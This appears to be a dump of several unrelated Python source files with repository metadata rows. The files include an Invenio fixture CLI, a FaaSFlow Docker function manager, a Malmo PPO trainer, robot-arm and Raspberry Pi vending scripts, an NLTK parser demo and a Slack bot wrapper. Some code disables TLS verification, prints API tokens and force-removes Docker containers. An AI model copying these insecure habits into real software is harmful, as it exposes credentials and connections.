url = '/'.join((api.strip('/'), pid, 'draft'))
try:
r = requests.get(api, timeout=5, verify=False)
r.raise_for_status()
except requests.exceptions.RequestException as e:
print(f'Couldn\'t connect to api at {api}. Is the application running?')
raise SystemExit(e)
headers = {
'authorization': f'Bearer {token}'
}
try:
response = requests.delete(url=url, headers=headers, verify=False)
return(response)
except:
print(f'Unable to delet draft with pid {pid}')
def publish_record(record_metadata, access_token):
sleep(1)
url = record_metadata['links']['publish']
headers = {
'authorization': f'Bearer {access_token}'
}
response = requests.post(url=url,
headers=headers,
verify=False)
return response.json()
@click.group()
def fixtures():
"""
An entry point for fixtures subcommands, e.g., ingest, purge
"""
pass
@fixtures.command()
@click.option('-a', '--api', required=True, type=str,
default=config.DEFAULT_RECORDS_API_URL,
help=f'Invenio REST API base URL. Default={config.DEFAULT_RECORDS_API_URL}')
@click.option('-d', '--dir', required=True,
type=click.Path(exists=True),
default=config.DEFAULT_FIXTURES_DIR, help=f'Path to directory of fixtures. Default={config.DEFAULT_FIXTURES_DIR}')
@click.option('-o', '--output', required=True, type=str,
default=config.DEFAULT_FIXTURES_OUTFILE,
help=f'Where new fixture pid mappings will be written')
@click.option('-t', '--token', help='REST API token')
def ingest(api, dir, output, token):
"""
Post local dir of UV fixture draft records via REST API.
"""
click.secho('REST API: ', nl=False, bold=True, fg='green')
click.secho(api)
click.secho('Fixtures directory: ', nl=False, bold=True, fg='green')
click.secho(dir)
if token is None:
token = utils.token_from_user(email=config.DEFAULT_FIXTURES_USER, name='default-su-token')
click.secho('Auth Token: ', nl=False, bold=True, fg='green')
click.secho(token)
records = glob.glob(f'{dir}/**/*.json', recursive=True)
click.secho(f'\nFound {len(records)} records', nl=True, bold=True, fg='blue')
results = json.loads(open(output).read()) if os.path.exists(output) else {}
for file in records:
click.secho(f'Posting record from {file}', nl=True, fg='blue')
dict = json.loads(open(file).read())
draft = create_record_draft(dict, api, token)
uv_id = os.path.dirname(file).split('/')[-1]
results[draft['id']] = uv_id
os.makedirs(os.path.dirname(output), exist_ok=True)
with open(output, "w") as f:
json.dump(results, f)
# record = publish_record(draft, token)
@fixtures.command()
@click.option('-a', '--api', required=True, type=str,
default=config.DEFAULT_RECORDS_API_URL,
help=f'Invenio REST API base URL. Default={config.DEFAULT_RECORDS_API_URL}')
@click.option('-d', '--dir', required=True,
type=click.Path(exists=True),
default=config.DEFAULT_FIXTURES_DIR, help=f'Path to directory of fixtures. Default={config.DEFAULT_FIXTURES_DIR}')
@click.option('-o', '--output', required=True, type=str,
default=config.DEFAULT_FIXTURES_OUTFILE,
help=f'Where new fixture pid mappings will be written')
@click.option('-t', '--token', help='REST API token')
def purge(api, dir, output, token):
"""
Delete all UV fixture draft records via REST API.
"""
click.secho('REST API: ', nl=False, bold=True, fg='green')
click.secho(api)
if token is None:
token = utils.token_from_user(email=config.DEFAULT_FIXTURES_USER, name='default-su-token')
click.secho('Auth Token: ', nl=False, bold=True, fg='green')
click.secho(token)
results = json.loads(open(output).read()) if os.path.exists(output) else {}
for pid, uv_id in results.copy().items():
res = delete_record_draft(pid, api, token)
if res.ok:
click.secho(f'Delecting draft record {uv_id} aka {pid}', nl=True, bold=True, fg='blue')
results.pop(pid)
os.makedirs(os.path.dirname(output), exist_ok=True)
with open(output, "w") as f:
json.dump(results, f)
@fixtures.command()
@click.option('-d', '--dir', required=True,
type=click.Path(exists=True),
default=config.DEFAULT_FIXTURES_DIR, help=f'Path to directory of fixtures. Default={config.DEFAULT_FIXTURES_DIR}')
@click.option('-s', '--schema-file', required=True,
type=click.Path(exists=True),
default=config.DEFAULT_SCHEMA_PATH, help=f'Path to json schema. Default={config.DEFAULT_SCHEMA_PATH}')
def validate(dir, schema_file):
"""
Validate local dir of fixture records against JSON schema.
"""
click.secho('Fixtures directory: ', nl=False, bold=True, fg='green')
click.secho(dir)
click.secho('JSON Schema: ', nl=False, bold=True, fg='green')
click.secho(schema_file)
records = glob.glob(f'{dir}/**/*.json', recursive=True)
click.secho(f'\nFound {len(records)} records', nl=True, bold=True, fg='blue')
schema = json.loads(open(schema_file).read())
Draft4Validator.check_schema(schema)
validator = Draft4Validator(schema, format_checker=None)
for file in records:
dict = json.loads(open(file).read())
try:
validator.validate(dict)
click.secho(f'{file} passes', nl=True, fg='blue')
except BaseException as error:
click.secho(f'{file} fails', nl=True, fg='red')
print('An exception occurred: {}'.format(error))
| 33.146789
| 128
| 0.63313
| 932
| 7,226
| 4.831545
| 0.216738
| 0.044415
| 0.062181
| 0.049745
| 0.617366
| 0.596713
| 0.573173
| 0.567177
| 0.540084
| 0.540084
| 0
| 0.003049
| 0.22848
| 7,226
| 217
| 129
| 33.299539
| 0.804664
| 0.07902
| 0
| 0.608392
| 0
| 0
| 0.180188
| 0.034488
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048951
| false
| 0.013986
| 0.06993
| 0
| 0.132867
| 0.027972
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b55d244aa62443aced945674009694fb76ee238b
| 1,834
|
py
|
Python
|
src/function_manager/function_manager.py
|
lzjzx1122/FaaSFlow
|
c4a32a04797770c21fe6a0dcacd85ac27a3d29ec
|
[
"Apache-2.0"
] | 24
|
2021-12-02T01:00:54.000Z
|
2022-03-27T00:50:28.000Z
|
src/function_manager/function_manager.py
|
lzjzx1122/FaaSFlow
|
c4a32a04797770c21fe6a0dcacd85ac27a3d29ec
|
[
"Apache-2.0"
] | null | null | null |
src/function_manager/function_manager.py
|
lzjzx1122/FaaSFlow
|
c4a32a04797770c21fe6a0dcacd85ac27a3d29ec
|
[
"Apache-2.0"
] | 3
|
2021-12-02T01:00:47.000Z
|
2022-03-04T07:33:09.000Z
|
import gevent
import docker
import os
from function_info import parse
from port_controller import PortController
from function import Function
import random
repack_clean_interval = 5.000 # repack and clean every 5 seconds
dispatch_interval = 0.005 # 200 qps at most
# the class for scheduling functions' inter-operations
class FunctionManager:
def __init__(self, config_path, min_port):
self.function_info = parse(config_path)
self.port_controller = PortController(min_port, min_port + 4999)
self.client = docker.from_env()
self.functions = {
x.function_name: Function(self.client, x, self.port_controller)
for x in self.function_info
}
self.init()
def init(self):
print("Clearing previous containers.")
os.system('docker rm -f $(docker ps -aq --filter label=workflow)')
gevent.spawn_later(repack_clean_interval, self._clean_loop)
gevent.spawn_later(dispatch_interval, self._dispatch_loop)
def _clean_loop(self):
gevent.spawn_later(repack_clean_interval, self._clean_loop)
for function in self.functions.values():
gevent.spawn(function.repack_and_clean)
def _dispatch_loop(self):
gevent.spawn_later(dispatch_interval, self._dispatch_loop)
for function in self.functions.values():
gevent.spawn(function.dispatch_request)
def run(self, function_name, request_id, runtime, input, output, to, keys):
# print('run', function_name, request_id, runtime, input, output, to, keys)
if function_name not in self.functions:
raise Exception("No such function!")
return self.functions[function_name].send_request(request_id, runtime, input, output, to, keys)
| 37.428571
| 104
| 0.681025
| 229
| 1,834
| 5.222707
| 0.344978
| 0.055184
| 0.053512
| 0.052676
| 0.36204
| 0.348662
| 0.348662
| 0.32107
| 0.244147
| 0.091973
| 0
| 0.011429
| 0.236641
| 1,834
| 48
| 105
| 38.208333
| 0.842857
| 0.09542
| 0
| 0.166667
| 0
| 0
| 0.061644
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.138889
| false
| 0
| 0.194444
| 0
| 0.388889
| 0.027778
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b55f0ffd6458d9da1434363a2f94293d840e899b
| 6,717
|
py
|
Python
|
MalmoEnv/run.py
|
chemgymrl/malmo
|
207e2530ec94af46450ba6d0e62d691ade91e282
|
[
"MIT"
] | 1
|
2022-02-17T07:58:06.000Z
|
2022-02-17T07:58:06.000Z
|
MalmoEnv/run.py
|
chemgymrl/malmo
|
207e2530ec94af46450ba6d0e62d691ade91e282
|
[
"MIT"
] | null | null | null |
MalmoEnv/run.py
|
chemgymrl/malmo
|
207e2530ec94af46450ba6d0e62d691ade91e282
|
[
"MIT"
] | null | null | null |
# ------------------------------------------------------------------------------------------------
# Copyright (c) 2018 Microsoft Corporation
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
# associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT
# NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# ------------------------------------------------------------------------------------------------
import os
import numpy as np
import matplotlib.pyplot as plt
import malmoenv
import argparse
from pathlib import Path
import time
from PIL import Image
from stable_baselines3.common import results_plotter
from stable_baselines3.common.monitor import Monitor
from stable_baselines3.common.results_plotter import load_results, ts2xy, plot_results
from stable_baselines3.common.noise import NormalActionNoise
from stable_baselines3.common.callbacks import BaseCallback
from stable_baselines3.common.env_checker import check_env
from stable_baselines3 import PPO
class SaveOnBestTrainingRewardCallback(BaseCallback):
"""
Callback for saving a model (the check is done every ``check_freq`` steps)
based on the training reward (in practice, we recommend using ``EvalCallback``).
:param check_freq:
:param log_dir: Path to the folder where the model will be saved.
It must contains the file created by the ``Monitor`` wrapper.
:param verbose: Verbosity level.
"""
def __init__(self, check_freq: int, log_dir: str, verbose: int = 1):
super(SaveOnBestTrainingRewardCallback, self).__init__(verbose)
self.check_freq = check_freq
self.log_dir = log_dir
self.save_path = os.path.join(log_dir, 'best_model')
self.best_mean_reward = -np.inf
# def _init_callback(self) -> None:
# # # Create folder if needed
# # if self.save_path is not None:
# # os.makedirs(self.save_path, exist_ok=True)
def _on_step(self) -> bool:
if self.n_calls % self.check_freq == 0:
# Retrieve training reward
x, y = ts2xy(load_results(self.log_dir), 'timesteps')
if len(x) > 0:
# Mean training reward over the last 100 episodes
mean_reward = np.mean(y[-100:])
if self.verbose > 0:
print(f"Num timesteps: {self.num_timesteps}")
print(f"Best mean reward: {self.best_mean_reward:.2f} - Last mean reward per episode: {mean_reward:.2f}")
# New best model, you could save the agent here
if mean_reward > self.best_mean_reward:
self.best_mean_reward = mean_reward
# Example for saving best model
if self.verbose > 0:
print(f"Saving new best model to {self.save_path}")
self.model.save(self.save_path)
return True
log_dir = "tmp/"
os.makedirs(log_dir, exist_ok=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='malmovnv test')
parser.add_argument('--mission', type=str, default='missions/jumping.xml', help='the mission xml')
parser.add_argument('--port', type=int, default=9000, help='the mission server port')
parser.add_argument('--server', type=str, default='127.0.0.1', help='the mission server DNS or IP address')
parser.add_argument('--port2', type=int, default=None, help="(Multi-agent) role N's mission port. Defaults to server port.")
parser.add_argument('--server2', type=str, default=None, help="(Multi-agent) role N's server DNS or IP")
parser.add_argument('--episodes', type=int, default=100, help='the number of resets to perform - default is 1')
parser.add_argument('--episode', type=int, default=0, help='the start episode - default is 0')
parser.add_argument('--role', type=int, default=0, help='the agent role - defaults to 0')
parser.add_argument('--episodemaxsteps', type=int, default=100, help='max number of steps per episode')
parser.add_argument('--saveimagesteps', type=int, default=0, help='save an image every N steps')
parser.add_argument('--resync', type=int, default=0, help='exit and re-sync every N resets'
' - default is 0 meaning never.')
parser.add_argument('--experimentUniqueId', type=str, default='test1', help="the experiment's unique id.")
args = parser.parse_args()
if args.server2 is None:
args.server2 = args.server
xml = Path(args.mission).read_text()
env = malmoenv.make()
env.init(xml, args.port,
server=args.server,
server2=args.server2, port2=args.port2,
role=args.role,
exp_uid=args.experimentUniqueId,
episode=args.episode, resync=args.resync)
env = Monitor(env, log_dir)
# print("checking env")
check_env(env, True)
s = SaveOnBestTrainingRewardCallback(2000, log_dir)
# print("checked env")
model = PPO("MlpPolicy", env, verbose=1, tensorboard_log="./ppo_test_tensorboard/")
#model.load("tmp/best_model.zip")
model.learn(total_timesteps=100000, callback=s, reset_num_timesteps=False)
# print("trained and saved model")
# for i in range(args.episodes):
# print("reset " + str(i))
# obs = env.reset()
# steps = 0
# done = False
# while not done and (args.episodemaxsteps <= 0 or steps < args.episodemaxsteps):
# # h, w, d = env.observation_space.shape
# # print(done)
# action, _states = model.predict(obs, deterministic=True)
# # action = env.action_space.sample()
# obs, reward, done, info = env.step(action)
# steps += 1
# # print("reward: " + str(reward))
# # print(obs)
# time.sleep(.05)
env.close()
| 46.645833
| 128
| 0.650737
| 879
| 6,717
| 4.861206
| 0.333333
| 0.025275
| 0.047742
| 0.036508
| 0.083782
| 0.052422
| 0.029487
| 0.01451
| 0
| 0
| 0
| 0.01434
| 0.221379
| 6,717
| 143
| 129
| 46.972028
| 0.802677
| 0.37755
| 0
| 0.028571
| 0
| 0.014286
| 0.203812
| 0.012219
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028571
| false
| 0
| 0.214286
| 0
| 0.271429
| 0.042857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b55f2629add10c43d98efae9012f1f13e3691bd5
| 1,172
|
py
|
Python
|
example/wrapper/common/5001-get_tgpio_digital.py
|
krasin/xArm-Python-SDK-ssh
|
9c854e8bfa78d0e91b67efbab79f733ddf19e916
|
[
"BSD-3-Clause"
] | 62
|
2018-11-30T05:53:32.000Z
|
2022-03-20T13:15:22.000Z
|
example/wrapper/common/5001-get_tgpio_digital.py
|
krasin/xArm-Python-SDK-ssh
|
9c854e8bfa78d0e91b67efbab79f733ddf19e916
|
[
"BSD-3-Clause"
] | 25
|
2019-08-12T18:53:41.000Z
|
2021-12-28T10:17:39.000Z
|
example/wrapper/common/5001-get_tgpio_digital.py
|
krasin/xArm-Python-SDK-ssh
|
9c854e8bfa78d0e91b67efbab79f733ddf19e916
|
[
"BSD-3-Clause"
] | 43
|
2019-01-03T04:47:13.000Z
|
2022-03-18T06:40:59.000Z
|
#!/usr/bin/env python3
# Software License Agreement (BSD License)
#
# Copyright (c) 2019, UFACTORY, Inc.
# All rights reserved.
#
# Author: Vinman <vinman.wen@ufactory.cc> <vinman.cub@gmail.com>
"""
Example: Get GPIO Digital
"""
import os
import sys
import time
sys.path.append(os.path.join(os.path.dirname(__file__), '../../..'))
from xarm.wrapper import XArmAPI
from configparser import ConfigParser
parser = ConfigParser()
parser.read('../robot.conf')
try:
ip = parser.get('xArm', 'ip')
except:
ip = input('Please input the xArm ip address[192.168.1.194]:')
if not ip:
ip = '192.168.1.194'
arm = XArmAPI(ip)
time.sleep(0.5)
if arm.warn_code != 0:
arm.clean_warn()
if arm.error_code != 0:
arm.clean_error()
last_digitals = [-1, -1]
while arm.connected and arm.error_code != 19 and arm.error_code != 28:
code, digitals = arm.get_tgpio_digital()
if code == 0:
if digitals[0] == 1 and digitals[0] != last_digitals[0]:
print('IO0 input high level')
if digitals[1] == 1 and digitals[1] != last_digitals[1]:
print('IO1 input high level')
last_digitals = digitals
time.sleep(0.1)
| 23.44
| 70
| 0.648464
| 175
| 1,172
| 4.251429
| 0.451429
| 0.064516
| 0.048387
| 0.026882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.051064
| 0.197952
| 1,172
| 49
| 71
| 23.918367
| 0.740426
| 0.176621
| 0
| 0
| 0
| 0
| 0.135021
| 0.024262
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 0.166667
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b56057ff5dbd4cdc1d25d244ff87b18b26455492
| 544
|
py
|
Python
|
49-group anagrams/main.py
|
ytong82/leetcode
|
34e08c430d654b14b1608211f74702f57e507189
|
[
"Apache-2.0"
] | null | null | null |
49-group anagrams/main.py
|
ytong82/leetcode
|
34e08c430d654b14b1608211f74702f57e507189
|
[
"Apache-2.0"
] | null | null | null |
49-group anagrams/main.py
|
ytong82/leetcode
|
34e08c430d654b14b1608211f74702f57e507189
|
[
"Apache-2.0"
] | null | null | null |
class Solution:
def groupAnagrams(self, strs):
l = len(strs)
if l == 0:
return []
map = dict()
for i in range(l):
key = ''.join(sorted(strs[i]))
if key in map.keys():
map[key].append(i)
else:
map[key] = [i]
res = []
for key in map.keys():
res.append([strs[k] for k in map[key]])
return res
strs = ["eat", "tea", "tan", "ate", "nat", "bat"]
sol = Solution()
print(sol.groupAnagrams(strs))
| 22.666667
| 51
| 0.443015
| 68
| 544
| 3.544118
| 0.485294
| 0.062241
| 0.06639
| 0.099585
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00304
| 0.395221
| 544
| 24
| 52
| 22.666667
| 0.729483
| 0
| 0
| 0
| 0
| 0
| 0.033028
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0
| 0
| 0.210526
| 0.052632
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b561af012e5087c35cc2997a33fe02fbbdb5ae5d
| 2,429
|
py
|
Python
|
vending.py
|
mit-dci/litvending
|
28f8f2b51691eac7c69de153aafbe72663d9892c
|
[
"MIT"
] | 1
|
2018-06-20T01:42:54.000Z
|
2018-06-20T01:42:54.000Z
|
vending.py
|
mit-dci/litvending
|
28f8f2b51691eac7c69de153aafbe72663d9892c
|
[
"MIT"
] | null | null | null |
vending.py
|
mit-dci/litvending
|
28f8f2b51691eac7c69de153aafbe72663d9892c
|
[
"MIT"
] | 1
|
2022-02-15T06:48:15.000Z
|
2022-02-15T06:48:15.000Z
|
#!/usr/bin/env python3
import os
import time
import sys
gpio = None
try:
import RPi.GPIO
gpio = RPi.GPIO
except:
print('RPi library not found. We\'re probably on a dev machine. Moving on...')
import lvconfig
import litrpc
# This could be more efficient, we're making a lot more requests than we need to.
def check_deposit(cointype):
bals = conn.balance()['Balances']
sum = 0
for b in bals:
if b['CoinType'] == int(cointype):
# I'm not sure how this works, can it return dupes?
sum += b['ChanTotal'] + b['TxoTotal']
return sum
def main(cfg):
if cfg['trigger_pin_num'] == -1:
print('You need to configure me first. Come back later.')
sys.exit(1)
# Find important commonly-used variables.
trigger_pin = cfg['trigger_pin_num']
sleep_time = cfg['pin_high_time']
deposit_delay = cfg['deposit_delay_time']
# Set up the GPIO pins.
if gpio is not None:
gpio.setmode(gpio.BOARD)
gpio.setwarnings(False)
gpio.setup(trigger_pin, gpio.OUT)
# Set up the connection and connect.
print('Connecting to lit at', cfg['lit_ip'], 'on port', cfg['lit_port'])
global conn
conn = litrpc.LitClient(cfg['lit_ip'], cfg['lit_port'])
print('Set up client.')
# Then just enter the main loop.
print('Waiting for payment...')
last_bal = {}
for ty in cfg['coin_type_ids']:
last_bal[ty] = -1
while True:
# First figure out how much might have been sent to us.
to_insert = 0
for ty in cfg['coin_type_ids']:
bal = check_deposit(ty)
if last_bal[ty] != -1:
diff = bal - last_bal[ty]
if diff <= 0: # when we withdraw it would break everything
continue
unit_cost = cfg['unit_costs'][ty]
units = int(diff // unit_cost)
extra = diff - units * unit_cost
to_insert += units
print('Balance for', ty, 'is now', bal, ', got a spend of', diff, 'sat worth', units, 'units with an extra', extra, 'sat left over')
last_bal[ty] = bal
# Then send that many quarters.
if to_insert != 0:
print('Total to insert:', to_insert)
if gpio is not None:
for i in range(to_insert):
# Just turn it on, wait a bit, and turn it off.
gpio.output(trigger_pin, gpio.HIGH)
time.sleep(sleep_time)
gpio.output(trigger_pin, gpio.LOW)
time.sleep(deposit_delay)
print('Done')
else:
print('Not running on RPi, doing nothing!')
else:
print('No payment')
time.sleep(cfg['poll_rate'])
if __name__ == '__main__':
main(lvconfig.load_config())
| 26.11828
| 136
| 0.669823
| 393
| 2,429
| 4.012723
| 0.445293
| 0.038047
| 0.022828
| 0.020292
| 0.076094
| 0.026633
| 0.026633
| 0
| 0
| 0
| 0
| 0.004639
| 0.201317
| 2,429
| 92
| 137
| 26.402174
| 0.808247
| 0.186085
| 0
| 0.089552
| 0
| 0
| 0.229908
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029851
| false
| 0
| 0.089552
| 0
| 0.134328
| 0.149254
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b56b02915f5cdfb61babcb70fc1c32bc2970b2fa
| 597
|
py
|
Python
|
Section02/ParsingChart.py
|
fosterleejoe/Developing-NLP-Applications-Using-NLTK-in-Python
|
f2cac32c02d0632fb89f32446388ef15d9926bbc
|
[
"MIT"
] | 67
|
2017-11-23T18:48:47.000Z
|
2022-03-29T08:03:25.000Z
|
Section02/ParsingChart.py
|
fosterleejoe/Developing-NLP-Applications-Using-NLTK-in-Python
|
f2cac32c02d0632fb89f32446388ef15d9926bbc
|
[
"MIT"
] | null | null | null |
Section02/ParsingChart.py
|
fosterleejoe/Developing-NLP-Applications-Using-NLTK-in-Python
|
f2cac32c02d0632fb89f32446388ef15d9926bbc
|
[
"MIT"
] | 49
|
2017-12-06T16:10:14.000Z
|
2021-11-25T09:02:49.000Z
|
from nltk.grammar import CFG
from nltk.parse.chart import ChartParser, BU_LC_STRATEGY
grammar = CFG.fromstring("""
S -> T1 T4
T1 -> NNP VBZ
T2 -> DT NN
T3 -> IN NNP
T4 -> T3 | T2 T3
NNP -> 'Tajmahal' | 'Agra' | 'Bangalore' | 'Karnataka'
VBZ -> 'is'
IN -> 'in' | 'of'
DT -> 'the'
NN -> 'capital'
""")
cp = ChartParser(grammar, BU_LC_STRATEGY, trace=True)
sentence = "Bangalore is the capital of Karnataka"
tokens = sentence.split()
chart = cp.chart_parse(tokens)
parses = list(chart.parses(grammar.start()))
print("Total Edges :", len(chart.edges()))
for tree in parses: print(tree)
tree.draw()
| 22.961538
| 56
| 0.676717
| 90
| 597
| 4.433333
| 0.511111
| 0.0401
| 0.06015
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017857
| 0.155779
| 597
| 25
| 57
| 23.88
| 0.77381
| 0
| 0
| 0
| 0
| 0
| 0.386935
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.090909
| 0
| 0.090909
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b56c623a069eaa852720532015deec19073b3d1a
| 5,526
|
py
|
Python
|
sirbot/slack/wrapper.py
|
Ovvovy/sirbot-slack
|
2d27e49cfbc2cb12e87ef3814823d2ad68d0a788
|
[
"MIT"
] | 7
|
2017-05-06T11:37:25.000Z
|
2018-11-22T09:46:32.000Z
|
sirbot/slack/wrapper.py
|
Ovvovy/sirbot-slack
|
2d27e49cfbc2cb12e87ef3814823d2ad68d0a788
|
[
"MIT"
] | 19
|
2017-05-07T16:25:02.000Z
|
2017-09-22T08:02:59.000Z
|
sirbot/slack/wrapper.py
|
Ovvovy/sirbot-slack
|
2d27e49cfbc2cb12e87ef3814823d2ad68d0a788
|
[
"MIT"
] | 3
|
2017-05-06T11:37:28.000Z
|
2017-07-07T09:32:54.000Z
|
import logging
from .store.user import User
from .errors import SlackInactiveDispatcher, SlackNoThread
logger = logging.getLogger(__name__)
class SlackWrapper:
"""
A class to compose all available functionality of the slack plugin.
An instance is offered to all incoming message of all the plugins to
allow cross service messages
"""
def __init__(self, http_client, users, channels, groups, messages, threads,
bot, dispatcher):
self._http_client = http_client
self._threads = threads
self._dispatcher = dispatcher
self.messages = messages
self.users = users
self.channels = channels
self.groups = groups
self.bot = bot
async def send(self, *messages):
"""
Send the messages provided and update their timestamp
:param messages: Messages to send
"""
for message in messages:
message.frm = self.bot
if self.bot.type == 'rtm' and isinstance(message.to, User):
await self.users.ensure_dm(message.to)
if message.response_url:
# Message with a response url are response to actions or slash
# commands
data = message.serialize(type_='response')
await self._http_client.response(
data=data,
url=message.response_url
)
elif isinstance(message.to, User) and self.bot.type == 'rtm':
data = message.serialize(type_='send', to=self.bot.type)
message.raw = await self._http_client.message_send(
data=data,
token='bot'
)
elif isinstance(message.to, User) and self.bot.type == 'event':
data = message.serialize(type_='send', to=self.bot.type)
message.raw = await self._http_client.message_send(data=data)
else:
data = message.serialize(type_='send', to=self.bot.type)
message.raw = await self._http_client.message_send(data=data)
async def update(self, *messages):
"""
Update the messages provided and update their timestamp
:param messages: Messages to update
"""
for message in messages:
if isinstance(message.to, User):
await self.users.ensure_dm(message.to)
message.frm = self.bot
message.subtype = 'message_changed'
message.raw = await self._http_client.message_update(
message=message)
message.ts = message.raw.get('ts')
# await self._save_outgoing_message(message)
async def delete(self, *messages):
"""
Delete the messages provided
:param messages: Messages to delete
"""
for message in messages:
message.timestamp = await self._http_client.message_delete(message)
async def add_reaction(self, message, reaction):
"""
Add a reaction to a message
:Example:
>>> chat.add_reaction(Message, 'thumbsup')
Add the thumbup and robotface reaction to the message
:param messages: List of message and reaction to add
"""
await self._http_client.add_reaction(message, reaction)
async def delete_reaction(self, message, reaction):
"""
Delete reactions from messages
:Example:
>>> chat.delete_reaction(Message, 'thumbsup')
Delete the thumbup and robotface reaction from the message
:param messages: List of message and reaction to delete
"""
await self._http_client.delete_reaction(message, reaction)
async def get_reactions(self, message):
"""
Query the reactions of messages
:param messages: Messages to query reaction from
:return: dictionary of reactions by message
:rtype: dict
"""
reactions = await self._http_client.get_reaction(message)
for reaction in reactions:
reaction['users'] = [
self.users.get(id_=user_id)
for user_id in reaction.get('users', list())
]
message.reactions = reactions
return reactions
def add_action(self, id_, func, public=False):
if 'action' in self._dispatcher:
self._dispatcher['action'].register(id_, func, public=public)
else:
raise SlackInactiveDispatcher
def add_event(self, event, func):
if 'event' in self._dispatcher:
self._dispatcher['event'].register(event, func)
else:
raise SlackInactiveDispatcher
def add_command(self, command, func):
if 'command' in self._dispatcher:
self._dispatcher['command'].register(command, func)
else:
raise SlackInactiveDispatcher
def add_message(self, match, func, flags=0, mention=False, admin=False,
channel_id='*'):
if 'action' in self._dispatcher:
self._dispatcher['message'].register(match, func, flags, mention,
admin, channel_id)
else:
raise SlackInactiveDispatcher
def add_thread(self, message, func, user_id='all'):
if message.thread or message.timestamp:
self._threads[message.thread or message.timestamp][user_id] = func
else:
raise SlackNoThread()
| 32.892857
| 79
| 0.596091
| 602
| 5,526
| 5.33887
| 0.19103
| 0.037337
| 0.047915
| 0.053205
| 0.398569
| 0.274113
| 0.247978
| 0.21313
| 0.21313
| 0.187617
| 0
| 0.000266
| 0.31958
| 5,526
| 167
| 80
| 33.08982
| 0.854521
| 0.05067
| 0
| 0.288889
| 0
| 0
| 0.027227
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.033333
| 0
| 0.122222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b56d3d57d3b008ef213624e96067cf823658819f
| 4,321
|
py
|
Python
|
rc/returninfo/classifier.py
|
ddangelorb/gthbmining
|
a7d18623cd14a2ffd2508a4bb6a71b06a5f26215
|
[
"MIT"
] | 4
|
2019-09-17T02:53:51.000Z
|
2020-10-23T14:48:16.000Z
|
rc/returninfo/classifier.py
|
ddangelorb/gthbmining
|
a7d18623cd14a2ffd2508a4bb6a71b06a5f26215
|
[
"MIT"
] | null | null | null |
rc/returninfo/classifier.py
|
ddangelorb/gthbmining
|
